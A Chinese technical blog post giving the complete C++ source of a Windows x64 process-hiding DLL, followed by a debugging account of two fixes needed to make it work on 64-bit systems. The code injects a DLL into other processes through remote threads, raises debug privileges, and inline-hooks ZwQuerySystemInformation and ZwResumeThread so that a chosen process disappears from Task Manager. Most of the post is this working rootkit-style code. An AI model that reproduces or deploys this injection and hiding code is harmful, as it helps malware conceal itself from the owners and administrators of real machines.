X64下进程隐藏实现与Debug

最新推荐文章于 2024-08-19 18:44:03 发布
最新推荐文章于 2024-08-19 18:44:03 发布
阅读量3.3k 收藏 6
点赞数 2
分类专栏: 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joliph/article/details/80816010
版权

之前写过几篇进程隐藏的技术贴,但是在X64下代码没有成功,昨晚深入调试了一会儿发现了问题所在,这里详细探讨下

先贴上完整的Hide.dll的cpp代码:

#include "Hide.h"
#define SystemProcessInformation    5
#define STATUS_SUCCESS              (0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH             (0xC0000004L)

//*****************************************************↓↓↓常量定义↓↓↓************************************************************
BYTE             ZwQuerySystemInformation_origin_byte[5] = { 0, };
BYTE             ZwResumeThread_origin_byte[5] = { 0, };
LPCTSTR      Dll_Path = L"d:hack.dll";
wchar_t const *Hide_Process = L"notepad.exe";
WCHAR        Goal_Name[1][100] = { L"taskmgr" };
WCHAR        filename[MAX_PATH];
static DWORD  prepid = 0;

//*****************************************************↓↓↓函数实现↓↓↓************************************************************
BOOL Whether_Hide_Goal(const WCHAR *processname) {
    const WCHAR *ori = processname;
    for (int i = 0; i<1; i++) {
        processname = ori;
        while (*processname != '\0') {
            WCHAR *s = Goal_Name[i];
            while (*processname != *s && *processname != (*s) - 32 && *processname != '\0') {
                processname++;
            }
            while (*processname != '\0' && (*processname == *s || *processname == (*s) - 32)) {
                processname++;
                s++;
            }
            if (*s == '\0') {
                return true;
            }
        }
    }
    return false;
}

BOOL IsNt6Plus() {          //判断内核版本是否为NT6+
    OSVERSIONINFO osvi;
    ZeroMemory(&osvi, sizeof(osvi));
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    if (osvi.dwMajorVersion == 6 || osvi.dwMajorVersion == 10)     //vista.7.8 = 6   10=10
        return true;
    return false;
}

BOOL MyCreateRemoteThread(HANDLE hProcess, LPTHREAD_START_ROUTINE pThreadProc, LPVOID pRemoteBuf) {
    HANDLE hThread = NULL;
    FARPROC pfunc = NULL;
    if (IsNt6Plus()) {
        pfunc = (GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx"));
        if (pfunc == NULL)  return false;
        ((PFNTCREATETHREADEX)pfunc)(&hThread, 0x1FFFFF, NULL, hProcess, pThreadProc, pRemoteBuf, FALSE, NULL, NULL, NULL, NULL);
        if (hThread == NULL)    return false;
    }
    else {
        hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
        if (hThread == NULL)    return false;
    }
    if (WAIT_FAILED == WaitForSingleObject(hThread, INFINITE))  return false;
    return true;
}

void InjectDll(DWORD pid = 0) {
    if (pid == 0)       return;
    EnableDebugPrivilege();  //权限提升
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess)  return;
    LPVOID pRemoteBuf = NULL;
    DWORD BufSize = (DWORD)(wcslen(Dll_Path) + 1) * sizeof(TCHAR);//+1:\0
    pRemoteBuf = VirtualAllocEx(hProcess, NULL, BufSize, MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)Dll_Path, BufSize, NULL);
    LPTHREAD_START_ROUTINE pThreadProc;
    HMODULE Kernel32_Handle = GetModuleHandle(L"kernel32.dll");
    pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(Kernel32_Handle, "LoadLibraryW");
    MyCreateRemoteThread(hProcess, pThreadProc, pRemoteBuf);
    CloseHandle(hProcess);
    hProcess = NULL;
}
BOOL EnableDebugPrivilege() {
    HANDLE hToken;
    BOOL fOk = FALSE;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        fOk = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
        hToken = NULL;
    }
    return fOk;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        GetModuleFileName(NULL, filename, MAX_PATH);
        if (Whether_Hide_Goal(filename)) {   //如果是我们想对其隐藏的进程则对ZwQuerySystemInformation挂钩
            hook("ntdll.dll", "ZwQuerySystemInformation", (PROC)NewZwQuerySystemInformation, ZwQuerySystemInformation_origin_byte);
        }
        else {                             //否则一定是explorer则对ZwResumeThread挂钩
            hook("ntdll.dll", "ZwResumeThread", (PROC)NewZwResumeThread, ZwResumeThread_origin_byte);
        }
        break;

    case DLL_PROCESS_DETACH:
        unhook("ntdll.dll", "ZwQuerySystemInformation", ZwQuerySystemInformation_origin_byte);
        unhook("ntdll.dll", "ZwResumeThread", ZwResumeThread_origin_byte);
        break;
    }
    return TRUE;
}

BOOL hook(LPCSTR DllName, LPCSTR FuncName, PROC Func_New, PBYTE origin_byte) {
    FARPROC p_ori_func;
    PBYTE   pbyte;
    DWORD   oldprotect;
    DWORD   address;
    byte       newbuf[5] = { (char)233,0, };

    p_ori_func = (FARPROC)GetProcAddress(GetModuleHandleA(DllName), FuncName);      //获取原函数地址
    pbyte = (PBYTE)p_ori_func;
    if (pbyte[0] == 0xE9)    return false;
    VirtualProtect((LPVOID)p_ori_func,5, PAGE_EXECUTE_READWRITE, &oldprotect);    //修改5字节属性为可写
    memcpy(origin_byte, p_ori_func,5);                                          //保存原函数前5字节指令
    address = (DWORD)Func_New - (DWORD)p_ori_func - 5;                              //计算跳转到NewZwQuerySystemInformation函数需要的jmp地址
    memcpy(&newbuf[1], &address,4);                                              //将计算出的地址写入newbuf
    memcpy(p_ori_func, newbuf,5);                                               //原函数处写入jmp xxx实现Hook
    VirtualProtect((LPVOID)p_ori_func,5, oldprotect, &oldprotect);             //恢复刚刚调整过的属性
    return true;
}

BOOL unhook(LPCSTR DllName, LPCSTR FuncName, PBYTE origin_byte) {
    FARPROC pfunc;
    PBYTE pbyte;
    DWORD oldprotect;

    pfunc = (FARPROC)GetProcAddress(GetModuleHandleA(DllName), FuncName);           //获取原函数地址
    pbyte = (PBYTE)pfunc;
    if (pbyte[0] != 0xE9)   return false;
    VirtualProtect((LPVOID)pfunc, 5, PAGE_EXECUTE_READWRITE, &oldprotect);          //修改5字节属性为可写
    memcpy(pfunc, origin_byte, 5);                                              //原函数前5字节恢复
    VirtualProtect((LPVOID)pfunc, 5, oldprotect, &oldprotect);                      //恢复刚刚调整过的属性
    return true;
}


NTSTATUS WINAPI NewZwQuerySystemInformation(ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
{
    NTSTATUS status;
    FARPROC pfunc;
    PSYSTEM_PROCESS_INFORMATION pcur = NULL;
    PSYSTEM_PROCESS_INFORMATION pprev = NULL;

    unhook("ntdll.dll", "ZwQuerySystemInformation", ZwQuerySystemInformation_origin_byte);         //解除Hook   ZwQuerySystemInformation   防止无限循环
    pfunc = (FARPROC)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "ZwQuerySystemInformation");    //动态获取原函数地址
    status = ((PFZWQUERYSYSTEMINFORMATION)pfunc)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);  //按照原始参数顺序调用原函数
    if (status != STATUS_SUCCESS) {                  //判断调用是否成功不可以的话就断Hook 返回错误status
        if (status == STATUS_INFO_LENGTH_MISMATCH)  hook("ntdll.dll", "ZwQuerySystemInformation", (PROC)NewZwQuerySystemInformation, ZwQuerySystemInformation_origin_byte);
        return status;
    }
    if (SystemInformationClass == SystemProcessInformation) {       //只有SystemInformationClass=5(查询进程列表)是才进行应用隐藏操作
        pcur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;      //当前指针指向返回的SystemInformation结构体
        while (TRUE) {
            if (pcur->ProcessName.Buffer) {                         //此结构体ProcessName成员的Buffer成员存在则进入
                if (!wcscmp(pcur->ProcessName.Buffer, Hide_Process)) { //比较此结构体进程名是否为需要隐藏的进程名,是则进行链表下链操作
                    if (pcur->NextEntryOffset == 0)
                        pprev->NextEntryOffset = 0;
                    else
                        if (pprev) {
                            pprev->NextEntryOffset += pcur->NextEntryOffset;
                        }
                        else {
                            SystemInformation=(PSYSTEM_PROCESS_INFORMATION)((ULONG64)pcur->NextEntryOffset);
                        }
                }
                else
                    pprev = pcur;                                   //非需要隐藏的进程则当前指针和前向指针分别后移一个
            }

            if (pcur->NextEntryOffset == 0)                          //没有下一个了就退出
                break;
            pcur = (PSYSTEM_PROCESS_INFORMATION)((ULONG64)pcur + pcur->NextEntryOffset);
        }
    }
    hook("ntdll.dll", "ZwQuerySystemInformation", (PROC)NewZwQuerySystemInformation, ZwQuerySystemInformation_origin_byte);   //处理完成,再次Hook
    return status;                                                  //返回status
}
NTSTATUS WINAPI NewZwResumeThread(HANDLE ThreadHandle, PULONG SuspendCount) {
    DWORD pid = GetProcessIdOfThread(ThreadHandle);  //获取新线程的进程PID
    if (pid != GetCurrentProcessId() && pid != prepid) {
        PROCESSENTRY32 pe;
        pe.dwSize = sizeof(pe);
        HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
        if (INVALID_HANDLE_VALUE != hSnapShot) {
            BOOL bprocess = Process32First(hSnapShot, &pe);
            while (bprocess) {
                if (pe.th32ProcessID == pid && Whether_Hide_Goal(pe.szExeFile)) {       //遍历进程列表如果新创建的进程的名字是要隐藏的目标的话就InjectDll
                    prepid = pid;
                    InjectDll(pid);          //DLL注入
                    break;
                }
                bprocess = Process32Next(hSnapShot, &pe);
            }
        }
        CloseHandle(hSnapShot);
        hSnapShot = NULL;
    }
    unhook("ntdll.dll", "ZwResumeThread", ZwResumeThread_origin_byte);            //防止死循环
    FARPROC pfn = (FARPROC)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "ZwResumeThread");    //动态获取原函数地址
    NTSTATUS status = ((PFZWRESUMETHREAD)pfn)(ThreadHandle, SuspendCount);
    hook("ntdll.dll", "ZwResumeThread", (PROC)NewZwResumeThread, ZwResumeThread_origin_byte);   //再次Hook住
    return status;
}

仔细看可以发现,主要有两处修改,均在NewZwQuerySystemInformation函数内部
修改一原先的代码:

unhook();
........
if (status != STATUS_SUCCESS) {
    return status;
}

修改后的代码:

unhook();
........
if (status != STATUS_SUCCESS) {
    if (status == STATUS_INFO_LENGTH_MISMATCH)
        hook("ntdll.dll", 
        "ZwQuerySystemInformation", 
        (PROC)NewZwQuerySystemInformation, 
        ZwQuerySystemInformation_origin_byte);
    return status;
    }

为什么要这么修改呢,调试分析X64下的CreateToolhelp32SnapShot可以发现
这里用红圈画出的这个CALL为一个关键CALL,这个CALL内部调用了ZwQuerySystemInformation这个函数,也就是我们HOOK的函数
1
内部调用的ZwQuerySystemInformation这个函数在X64下名字是RtlGetNativeSystemInformation
2
单步步入之后发现确实HOOK成功了,跳转到我们的新函数NewZwQuerySystemInformation函数,但是继续跟进调试我们自己实现的NewZwQuerySystemInformation的时候发现,unhook之后调用RtlGetNativeSystemInformation函数后返回了错误代码C0000004。
3
查询后发现是传递参数的时候出现了大小不够的情况,但是很奇怪,我们的大小参数都是照搬了他原始的啊,既然我们的出错了,他们的也一定出错了,经过调试分析发现确实如此,而且看上面CreateToolhelp32SnapShot函数内部调用RtlGetNativeSystemInformation函数的附近确实有对C0000004错误的处理代码,也就是说,这个错误发生后他会加大参数大小然后再次调用这个函数,这次就成功运行了,问题就在这个第二次调用上,我们发现有错误后就直接返回NT_STATUS,而没有再次Hook住这个RtlGetNativeSystemInformation函数,导致第二次调用的时候会出现失效问题,所以判断如果是STATUS_INFO_LENGTH_MISMATCH这个错误那么返回错误码后CreateToolhelp32SnapShot修正大小之后一定会再次调用RtlGetNativeSystemInformation函数,所以需要再次给函数hook住。

修改二原先的代码:

if (pcur->NextEntryOffset == 0)
    break;
    pcur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pcur + pcur->NextEntryOffset);

修改后:

if (pcur->NextEntryOffset == 0)
    break;
    pcur = (PSYSTEM_PROCESS_INFORMATION)((ULONG64)pcur + pcur->NextEntryOffset);

在遍历RtlGetNativeSystemInformation填充的SystemInformation结构体的时候需要循环遍历每个进程信息只对需要隐藏的进程进行隐藏(notepad.exe),但是pcur是64位指针类型,把它强制转换成ULONG会造成地址高位信息丢失问题,这个属于x32到x64的细节问题

总结:
这次连分析CreateToolhelp32SnapShot加调试分析修改bug共用了2个多小时吧,习惯了x32的调试分析想搞x64确实有些手生,最大的问题就是参数传递的问题,x32里习惯了看一眼站窗口就知道函数调用参数了,但是x64中要从rcx,rdx,r8,r9这些寄存器中找参数,不过这个习惯了之后应该也会很快。
这两处修改最花时间的是第二处,确实指针截断实在是太不起眼了,一个是ADD RAX,RBX.一个是ADD EAX,EBX确实区别不大,不过看了当注意到这个的时候就瞬间想到了是类型转换的问题,修改后终于搞定了这个X64下的进程隐藏问题,激动的我差点叫出来…..不过当时已经2点了,估计叫出来室友想杀我的心都有了.2333…

Istaroth
关注
专栏目录
x64隐藏可执行内存
hongduilanjun的博客
09-14 2370
我们如果想要实现进程隐藏在3环通常会使用到PEB断链去达到隐藏进程的效果,但是那只是表面上的进程隐藏,所有内存的详细信息都会被储存在vad树里面,这里我们就来探究在64位下如何隐藏可执行内存。
(渗透测试后期)Linux进程隐藏详解
qq_42882717的博客
03-27 1万+
文章目录(渗透测试后期)Linux进程隐藏详解前言Linux进程基础Linux进程侦查手段Linux进程隐藏手段一、基于用户态的进程隐藏方法1:小隐隐于/proc/pid——劫持readdir系统调用额外:加载至arm方法2:小隐隐于/proc/pid——mount 挂载二、基于内核态的进程隐藏方法3:大隐隐于内核——修改内核源码+系统调用方法4:大隐隐于内核——修改内核源码proc_pid_lookup方法5:大隐隐于内核——编写驱动/内核模块——LKM实现进程隐藏总结 (渗透测试后期)Linux进程隐藏
3环下的进程隐藏----64位windows 10
笔记本
05-27 2199
搞了两天还没搞定,记录下这两天分析的结论和疑惑吧。。。。。 1. MSDN说ZwQuerySystemInformation这个API在windows 8以上取消了,x86的GetProcAddress是可以找到ZwQuerySystemInformation这个API的,x64的GetProcAddress找到了一个名字不一样的API叫RtlGetNativeSystemInformatio...
在Win7x64隐藏进程和保护进程
11-10
在Win7x64隐藏进程和保护进程的代码,我还上传了相关文档,欢迎下载
x64dbg: 用于Windows的开源二进制调试器
最新发布
网络研究观
08-19 356
Windows的开源用户模式调试器。针对逆向工程和恶意软件分析进行了优化。
windows10驱动 x64--- 驱动实现隐藏任意进程(四)
weixin_41725706的博客
11-10 3544
PsInitialSystemProcess(进程HeadList) --->给出进程名--->0环实现进程隐藏
驱动开发:DKOM 实现进程隐藏
CSDN
10-11 5582
DKOM 就是直接内核对象操作技术,我们所有的操作都会被系统记录在内存中,而驱动进程隐藏的做旧就是操作进程的EPROCESS结构与线程的ETHREAD结构、链表,要实现进程隐藏我们只需要将某个进程中的信息,在系统EPROCESS链表中摘除即可实现进程隐藏。DKOM 隐藏进程的本质是操作EPROCESS结构体,EPROCESS结构体中包含了系统中的所有进程相关信息,还有很多指向其他结构的指针,首先我们可以通过WinDBG在内核调试模式下输入。函数就无法遍历出被摘链的进程了,从而实现进程隐藏
x64驱动 遍历 PspCidTable 枚举隐进程和线程
LYSM
06-05 2904
介绍 PspCidTable 是一个内核句柄表,存放进程和线程的内核对象(EPROCESS 和 ETHREAD),并通过 PID 和 TID 进行索引(所以进程ID和线程ID不可能相同),ID 号以 4 递增。 获取 PspCidTable 地址 win7: PsLookupProcessByProcessId(被导出) -> PspCidTable win10: PsLookupProcessByProcessId(被导出) -> PspReferenceCidTableEntry -&g
HideProcess完结篇.zip_c++ 进程隐藏_c++隐藏进程_隐藏进程_隐藏驱动_驱动隐藏进程
07-15
本资源"HideProcess完结篇.zip"聚焦于C++编程实现进程隐藏及驱动级隐藏技术。这些技术涉及操作系统内部工作原理,特别是Windows系统,是系统安全、恶意软件防御和逆向工程中的重要组成部分。 首先,我们要理解...
进程断链隐藏_r0_进程保护_进程断链隐藏_断链隐藏_驱动_
10-01
`x64`表明这可能是针对64位操作系统的代码,而`Debug`目录则可能包含了调试版本的输出文件,供开发者测试和调试用。 总的来说,这个话题涉及的是高级的系统编程和安全技术,包括但不限于内核级编程、驱动开发和恶意...
恶意代码--dll动态链接库注入目标进程隐藏自身(亲测win7x86和x64有效)
关注互联网安全的小虾米一枚
10-25 9379
0x01 dll 注入简介 所谓DLL注入就是将一个DLL放进某个进程的地址空间里,让它成为那个进程的一部分。 很多恶意代码,游戏外挂,盗号木马,顽固类病毒等程序均采用此寄生,隐藏在目标计算机之内。 0x02 dll 注入关键API VirtualAllocEx function VirtualAllocEx函数在远程进程的地址空间中分配一块内存
64位进程隐藏
04-27
64位进程隐藏工具,这个工具为简单版本。经测试,极少情况下会蓝屏
HideProcX64_V1源码
01-08
【标题】"HideProcX64_V1源码"是一个涉及到x64架构下的进程隐藏技术的编程资源。源码通常包含程序的核心逻辑和实现细节,对于开发者来说,它是理解软件工作原理的重要参考资料。此处提到的"HideProcX64_V1"很可能是...
探秘 HideProcess:一款强大的系统进程隐藏工具
gitblog_00009的博客
04-16 3471
探秘 HideProcess:一款强大的系统进程隐藏工具 项目地址:https://gitcode.com/landhb/HideProcess 在数字安全和隐私保护的领域里,有时候我们需要对特定的程序或进程进行隐藏以增强系统的安全性或实现某些高级功能。这里,我们要介绍的是一个名为 HideProcess 的开源项目,它提供了一种简单而高效的方式来隐藏 Windows 系统中的进程。 项目简介 H...
win10驱动级-隐藏进程稳定不蓝屏技术
hzw320的博客
11-18 3770
支持到了win10 64位系统 , 支持隐藏目标进程(32/64位程序进程),隐藏后,连各种ark驱动工具都看不见我们的驱动隐藏进程隐藏进程呢,在之前很久以前的我们的game-ec 驱动模块usb版里 32位驱动 就有这个功能了 ,基本上按月付费租千元价格的驱动里才有 支持win10 64位系统的驱动隐藏进程。一般学员都知道隐藏进程的作用,但是自从微软系统出了win10 64系统后,但市面上那些驱动隐藏进程的不蓝屏的很少,有的也价格也非常贵,虽然市面上有出现了win10的驱动隐藏进程的驱动,
进程隐藏
孤身我路
06-23 1620
头文件如下:class CHideProcss  {public: CHideProcss(); BOOL HideProcess(); virtual ~CHideProcss();private: BOOL InitNTDLL(); BOOL YHideProcess(); VOID CloseNTDLL(); VOID SetPhyscialMemorySectionCanBeWrite
如何隐藏导入表
Hell的博客
11-11 981
当有人问我这个问题的时候,我真的是一脸懵逼,我只知道编译的时候尽量少的引用dll可以减少导入表的量。
进程隐藏的各种方法 以及分析比较以及实现链接
hnust_xiehonghao的专栏
04-08 1万+
一、最为古老的DLL注入方法。   虽说古老,但也经历了不少变动,最初的win9X的系统没有Psapi,没有进程快照,所以一般是三级跳。跳啊跳……NT下可以直接用OpenProcess打开进程(打不开的话,提权到Debug权限),利用LoadLibrary,并且申请远程地址空间,然后把DLL注入到目标EXE进程当中,可谓省时省力,这也是目前应用作为普遍的方法之一。
LyScript 实现Hook隐藏调试器
热门推荐
CSDN
09-17 1万+
LyScript 插件集成的内置API函数可灵活的实现绕过各类反调试保护机制,前段时间发布的那一篇文章并没有详细讲解各类反调试机制的绕过措施,本次将补充这方面的知识点,运用LyScript实现绕过大多数通用调试机制,实现隐藏调试器的目的。该函数用于检测自身是否处于调试状态,其C系列代码如下所示,绕过此种方式很简单,只需要在函数头部写出ret指令即可。注意:此Api检查PEB中的值,因此如果修补PEB,则无需修补Api,这段绕过代码如下。如下案例,实现了在枚举窗体过程中实现弹窗,并不影响窗体的枚举。
QCC512x USB Debug驱动安装教程与烧录步骤详解
作者建议安装ADK,特别是版本ADK_QCC512x_WIN_6_3_1_Installer_6_3_1_31,这个安装包包含了驱动所需的C:\ProgramFiles(x86)\QTIL\Drivers\Qualcomm_Driver_WIN_USBDebug_102.0.0\Win7\x64\USBHubFilter.inf文件。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值